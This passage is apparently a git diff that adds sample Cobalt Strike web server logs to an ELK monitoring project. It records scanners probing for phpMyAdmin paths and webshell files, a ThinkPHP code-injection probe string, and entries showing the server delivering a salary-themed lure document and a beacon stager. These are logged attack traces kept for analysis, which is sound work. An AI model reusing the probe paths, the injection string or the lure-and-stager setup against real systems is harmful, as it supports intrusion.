/123131/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:44 UTC] "GET /phpMyAdminn/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:44 UTC] "GET /phpMyAdminhf/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:46 UTC] "GET /WWW/phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:47 UTC] "GET /phpMyAdmln/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:48 UTC] "GET /phpMyAdmin_ai/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:48 UTC] "GET /__phpMyAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:50 UTC] "GET /program/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:50 UTC] "GET /phppma/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:51 UTC] "GET /phpmy/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:52 UTC] "GET /mysql/admin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:53 UTC] "GET /mysql/dbadmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:53 UTC] "GET /mysql/sqlmanager/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" 
+132.232.201.218 unknown unknown [03/30 05:27:56 UTC] "GET /mysql/mysqlmanager/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:58 UTC] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:59 UTC] "GET /sqladmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:27:59 UTC] "GET /sql/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:28:00 UTC] "GET /SQL/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:28:00 UTC] "GET /websql/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:28:02 UTC] "GET /MySQLAdmin/index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" +132.232.201.218 unknown unknown [03/30 05:28:02 UTC] "GET /manager/html" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +195.154.211.33 unknown unknown [03/30 05:31:56 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +171.67.70.85 unknown unknown [03/30 07:18:50 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +13.81.175.116 unknown unknown [03/30 07:55:15 UTC] "GET /download/doc56893" 200 150016 "page Serves /root/cobaltstrike/uploads/OfferNr2020F6592_salary.doc" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" +13.81.175.116 unknown unknown [03/30 07:55:39 UTC] "GET /zcF9/" 200 208983 "beacon beacon stager x86" "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko" +103.84.4.83 unknown 
unknown [03/30 08:47:07 UTC] "GET /shell" 404 0 "" "Hello, world" +36.75.156.198 unknown unknown [03/30 08:49:33 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +46.101.171.183 unknown unknown [03/30 08:58:14 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +185.67.188.141 unknown unknown [03/30 09:37:33 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +196.195.46.244 unknown unknown [03/30 09:38:13 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +81.183.137.35 unknown unknown [03/30 09:44:23 UTC] "GET /" 404 0 "" "null" +45.170.220.85 unknown unknown [03/30 10:26:37 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +81.183.137.35 unknown unknown [03/30 10:26:57 UTC] "GET /stalker_portal/c/" 404 0 "" "Xenu Link Sleuth/1.3.8" +103.83.5.41 unknown unknown [03/30 10:28:54 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +81.183.137.35 unknown unknown [03/30 10:38:02 UTC] "GET /stalker_portal/c/" 404 0 "" "Xenu Link Sleuth/1.3.8" +81.183.137.35 unknown unknown [03/30 11:07:02 UTC] "GET /" 404 0 "" "Xenu Link Sleuth/1.3.8" +81.183.137.35 unknown unknown [03/30 11:07:03 UTC] "GET /" 404 0 "" "Xenu Link Sleuth/1.3.8" +171.67.70.85 unknown unknown [03/30 13:15:16 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +109.96.63.210 unknown unknown [03/30 14:20:22 UTC] "GET /" 404 0 "" "null" +189.252.15.136 unknown unknown [03/30 14:46:27 UTC] "GET /" 404 0 "" "null" +27.106.17.194 unknown unknown [03/30 15:31:05 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +68.183.195.23 
unknown unknown [03/30 15:41:39 UTC] "GET /index.php" 404 0 "" "null"
+81.183.137.35 unknown unknown [03/30 16:17:31 UTC] "GET /stalker_portal/c/" 404 0 "" "Xenu Link Sleuth/1.3.8"
+81.183.137.35 unknown unknown [03/30 16:32:42 UTC] "GET /stalker_portal/c/" 404 0 "" "Xenu Link Sleuth/1.3.8"
+192.241.238.53 unknown unknown [03/30 18:44:23 UTC] "GET /manager/html" 404 0 "" "Mozilla/5.0 zgrab/0.x"
+162.243.128.129 unknown unknown [03/30 18:47:33 UTC] "GET /manager/html" 404 0 "" "Mozilla/5.0 zgrab/0.x"
+171.67.70.85 unknown unknown [03/30 19:15:52 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x"
+192.241.195.168 unknown unknown [03/30 21:15:52 UTC] "GET /hudson" 404 0 "" "Mozilla/5.0 zgrab/0.x"
+128.14.209.226 unknown unknown [03/30 21:24:11 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
+185.153.197.10 unknown unknown [03/30 21:35:26 UTC] "/*�Cookie: mstshash=Administr" 404 0 "" "null"
+185.153.197.10 unknown unknown [03/30 21:43:03 UTC] "/*�Cookie: mstshash=Administr" 404 0 "" "null"
+195.205.161.11 unknown unknown [03/30 22:32:12 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
+91.200.224.106 unknown unknown [03/30 23:31:53 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
+196.52.43.54 unknown unknown [03/30 23:56:51 UTC] "GET /" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36"
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200331/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200331/weblog_80.log
new file mode 100644
index 00000000..6f8b2a20
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200331/weblog_80.log
@@ -0,0 +1,297 @@
+103.209.143.73 unknown unknown [03/31 00:02:56 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
+103.217.106.86 unknown unknown [03/31 00:46:46 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
+197.245.57.134 unknown unknown [03/31 00:59:58 UTC] "POST /boaform/admin/formPing" 404 0 "" "polaris botnet"
+114.67.109.108 unknown unknown [03/31 01:01:27 UTC] "GET /TP/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+114.67.109.108 unknown unknown [03/31 01:01:28 UTC] "GET /TP/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+114.67.109.108 unknown unknown [03/31 01:01:28 UTC] "GET /thinkphp/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+114.67.109.108 unknown unknown [03/31 01:01:29 UTC] "GET /html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+114.67.109.108 unknown unknown [03/31 01:01:30 UTC] "GET /public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+114.67.109.108 unknown unknown [03/31 01:01:31 UTC] "GET /TP/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+114.67.109.108 unknown unknown [03/31 01:01:32 UTC] "GET /elrekt.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+114.67.109.108 unknown unknown [03/31 01:01:32 UTC] "GET /index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+114.67.109.108 unknown unknown [03/31 01:01:33 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 
6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +171.67.70.85 unknown unknown [03/31 01:16:21 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +114.35.90.78 unknown unknown [03/31 02:45:00 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +14.102.69.150 unknown unknown [03/31 03:02:49 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +128.14.209.178 unknown unknown [03/31 04:28:40 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" +138.118.100.171 unknown unknown [03/31 06:53:48 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +145.255.8.40 unknown unknown [03/31 07:12:43 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +171.67.70.85 unknown unknown [03/31 07:19:22 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +152.136.192.51 unknown unknown [03/31 07:59:24 UTC] "GET /" 404 0 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" +152.136.192.51 unknown unknown [03/31 07:59:24 UTC] "GET /robots.txt" 404 0 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" +152.136.192.51 unknown unknown [03/31 07:59:24 UTC] "POST /Admin9b3a47a7/Login.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" +152.136.192.51 unknown unknown [03/31 07:59:28 UTC] "GET /" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" +152.136.192.51 unknown unknown [03/31 07:59:28 UTC] "GET /l.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" +152.136.192.51 unknown unknown [03/31 07:59:28 UTC] "GET /phpinfo.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" 
+152.136.192.51 unknown unknown [03/31 07:59:29 UTC] "GET /test.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" +152.136.192.51 unknown unknown [03/31 07:59:32 UTC] "POST /index.php" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" +152.136.192.51 unknown unknown [03/31 07:59:33 UTC] "POST /bbs.php" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" +152.136.192.51 unknown unknown [03/31 07:59:36 UTC] "POST /forums.php" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" +152.136.192.51 unknown unknown [03/31 07:59:40 UTC] "POST /forum/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" +152.136.192.51 unknown unknown [03/31 07:59:40 UTC] "POST /forums/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0" +152.136.192.51 unknown unknown [03/31 07:59:43 UTC] "POST /cgi-bin/php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +152.136.192.51 unknown unknown [03/31 07:59:44 UTC] "POST /cgi-bin/php5" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +152.136.192.51 unknown unknown [03/31 07:59:44 UTC] "POST /cgi-bin/php-cgi" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +152.136.192.51 unknown unknown [03/31 07:59:45 UTC] "POST /cgi-bin/php.cgi" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" +152.136.192.51 unknown unknown [03/31 07:59:49 UTC] "POST /base/post.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" 
+152.136.192.51 unknown unknown [03/31 07:59:50 UTC] "GET /webdav/" 404 0 "" "Mozilla/5.0" +152.136.192.51 unknown unknown [03/31 07:59:51 UTC] "GET /ispirit/im/upload.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:52 UTC] "GET /help.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:56 UTC] "GET /_query.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:56 UTC] "GET /test.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:56 UTC] "GET /db_cts.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:57 UTC] "GET /db_pma.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 07:59:59 UTC] "GET /logon.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:01 UTC] "GET /help-e.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:03 UTC] "GET /license.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:04 UTC] "GET /log.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:04 UTC] "GET /hell.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:05 UTC] "GET /pmd_online.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:07 UTC] "GET /shell.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:08 UTC] "GET /htdocs.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 
08:00:12 UTC] "GET /sane.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:12 UTC] "GET /desktop.ini.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:12 UTC] "GET /z.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:13 UTC] "GET /lala.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:17 UTC] "GET /lala-dpr.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:19 UTC] "GET /wpo.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:21 UTC] "GET /t6nv.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:24 UTC] "GET /text.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:24 UTC] "GET /wp-config.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:24 UTC] "GET /muhstik.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:29 UTC] "GET /muhstiks.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:32 UTC] "GET /muhstik-dpr.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:32 UTC] "GET /lol.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:37 UTC] "GET /cmd.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:43 UTC] "GET /cmdd.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:44 
UTC] "GET /knal.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:48 UTC] "GET /shell.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:51 UTC] "GET /scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:52 UTC] "GET /phpmyadmin/scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:00:52 UTC] "GET /phpMyAdmin/scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:00 UTC] "GET /phpmyadmin/scripts/db___.init.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:00 UTC] "GET /phpMyAdmin/scripts/db___.init.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:04 UTC] "GET /pma/scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:04 UTC] "GET /PMA/scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:07 UTC] "GET /MyAdmin/scripts/setup.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:08 UTC] "GET /pma/scripts/db___.init.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:08 UTC] "GET /PMA/scripts/db___.init.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:13 UTC] "GET /MyAdmin/scripts/db___.init.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:16 UTC] "GET /plugins/weathermap/editor.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows 
NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:20 UTC] "GET /cacti/plugins/weathermap/editor.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:23 UTC] "GET /index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:24 UTC] "GET /elrekt.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:24 UTC] "GET /App/" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:25 UTC] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))}" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:27 UTC] "GET /index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:28 UTC] "GET /" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:32 UTC] "GET /" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:32 UTC] "GET /joomla/" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:32 UTC] "GET /Joomla/" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:36 UTC] "GET /" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:39 UTC] "GET /rxr.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:43 UTC] "GET /home.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:47 UTC] "GET /spider.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:48 UTC] "GET /payload.php" 404 0 "" "Mozilla/4.0 
(compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:48 UTC] "GET /composers.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:49 UTC] "GET /izom.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:52 UTC] "GET /composer.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:52 UTC] "GET /hue2.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:52 UTC] "GET /Drupal.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:53 UTC] "GET /lang.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:56 UTC] "GET /izom.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:01:59 UTC] "GET /new_license.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:00 UTC] "GET /images/!.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:00 UTC] "GET /images/vuln.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:03 UTC] "GET /images/up.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:07 UTC] "GET /images/jsspwneed.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:08 UTC] "GET /images/stories/cmd.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:08 UTC] "GET /images/stories/filemga.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" +152.136.192.51 unknown unknown [03/31 08:02:09 
